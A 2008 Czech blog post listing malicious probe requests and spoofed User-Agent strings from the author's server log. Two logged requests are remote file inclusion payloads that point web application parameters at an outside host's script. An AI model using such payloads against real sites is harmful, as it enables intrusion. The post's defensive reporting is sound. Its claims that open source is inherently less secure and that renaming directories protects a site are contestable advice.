Nebezpečný Open Source aneb script-kiddies podruhé

9. 10. 2008 17:57 (aktualizováno) Nishkam Jan.

Jednou jsem už psal o script kiddies, kteří prohledávají vaše (naše) stránky za účelem nalezení známé bezpečnostní díry. Tady je další várka testovaných adres, které jsem vybral z jednodenního lo­gu:

  • /usage/index.html
  • /webalizer/in­dex.html
  • /kundendienst/an­fang.asp/
  • /ibswebsuntrus­t/cmserver/cus­tomer.cfm/
  • /NOF/startupda­te.aspx/
  • /1/2/3/busines­s/online/busi­ness-internet-banking/form-do/
  • /eg/login.php
  • /isapidl/custo­merform/cbonli­ne/?session=
  • /system_direc­tory/isa/file­.aspx/
  • /direct/certpic­kup.asp
  • /banking/BBLI­Banking/form.as­px/
  • /olb/MemberForm.do
  • /ccare/procedu­reinstruction­s/
  • /BWForm/rib.aspx/
  • /direct/certpic­kup.asp/index2­.php
  • /serverdll/on­lineemployerfor­m.aspx/
  • /CentralLogon­Web/Confirm
  • /InternetBankin­g/form.jsp/
  • /CentralLogon­Web/Confirmsslcom=22fd­nnerrDpdylcashvjOk­hb
  • /CentralFormWeb/For­m/
  • /CentralFormWeb/For­m/action=032853043­705475926972404220411285­829270696262249482874531­913807
  • /CentralFormWeb/For­maction=808064786­996999828375346573615908­878902084941575726532090­58467
  • /support.html
  • /details/confir­mpage.aspx
  • /verify.htm
  • /logon.htm/re­newmirror/secu­ritychallenge/OS­L.htm?LOB=668­954262737935&re­fer=ZBvTrzcSt6
  • /support.html/si­teminderagent/si­teminderagent/OS­L.htm?LOB=500­5137381&refer=n2L9Af­MJnj4X5OB
  • /logon.htm
  • /WCMALogin.htm
  • /details/confir­mpage.aspxaspx=13a­crDyedOckOvp
  • /login.htm/com­reportid/onli­neupdatemirror/OS­L.htm?LOB=785­5465479&refer=LhE­fAYATwb0bVv5
  • /login.htm
  • /wcmfd/wcmpv/­ConfirmClient­.do
  • /khkiybuqnlmrm.html
  • /include/plugin­s/jrBrowser/pur­chase.php?jam­room[jm_dir]=h­ttp://store.at­.ua/test.txt??
  • /src/browser/re­source/catego­ries/resource_ca­tegories_view­.php?CLASSES_RO­OT=http://sto­re.at.ua/test­.txt??
  • PROPFIND /up/
  • /serverdll/on­lineemployerfor­m.aspx/

Máte něco takového u sebe na serveru?

Ještě pro zajímavost – seznam User-Agent. Všechny budou zřejmě falešné, ale stojí za to se na ně podívat:

  • Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/74 (KHTML, like Gecko) Safari/74
  • Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
  • Mozilla/6.0 (compatible; MSIE 7.01; Windows 95)
  • Mozilla/6.0 (compatible; Amiga-AWeb)
  • Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
  • Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.19 [jp]
  • Mozilla/5.0 (compatible; Fedora Core 5) FC5 KDE
  • Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3
  • Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/51 (like Gecko) Safari/51
  • JetBrains 4.0 Release Candidate 3
  • Mozilla/4.0 (compatible; MSIE 4.01; Windows NT Windows CE)
  • JetBrains 5.0
  • Mozilla/6.0 (Macintosh; U; Amiga-AWeb) Safari 2.9 libwww-perl/5.808
  • Mozilla/5.0 (X11; U; OpenVMS AlphaServer_ES40; en-US; rv:1.4) Gecko/20030826 SWB/V1.4 (HP)
  • Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.go­ogle.com/bot.html)
  • Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)
  • Microsoft-WebDAV-MiniRedir/5.1.2600

IP adresy jsou většinou z Nigérie, Brazílie, Ukrajiny apod.

„Ruční“ procházení logu je zajímavé z několika hledisek, a tak si to dávám za úkol jako regulérní činnost. Mnoho věcí je vidět lépe jak z pohledu bezpečnostní analýzy a analýzy chyb na stránkách, tak i z pohledu analýzy chování návštěvníků.

Většinou se hledají objevené díry v Open Source Software (OSS). Nemám nic proti OSS, sám ho využívám, ale musím říct, že jeho bezpečnost je opravdu vždy ohrožená. Tím, že zdrojové kódy jsou přístupné komukoliv, riziko napadení je prostě vyšší. Nápadně často se objevují zprávy o kompromitaci balíků WordPress, Joomla, phpBB apod. Jako alespoň částečné preventivní opatření mě napadá změnit názvy adresářů a možná i souborů s knihovnami při instalaci u sebe na serveru. Opatření může být samozřejmě více a mnohem lepších, ale jako první pomoc to může posloužit. Třeba by někdo mohl udělat prográmek, který provede tyto minimální úpravy (změny názvů) automaticky i pro laiky, chystajicí se na svém serveru využívat OSS.

Sdílet

Upozorníme vás na články, které by vám neměly uniknout (maximálně 2x týdně).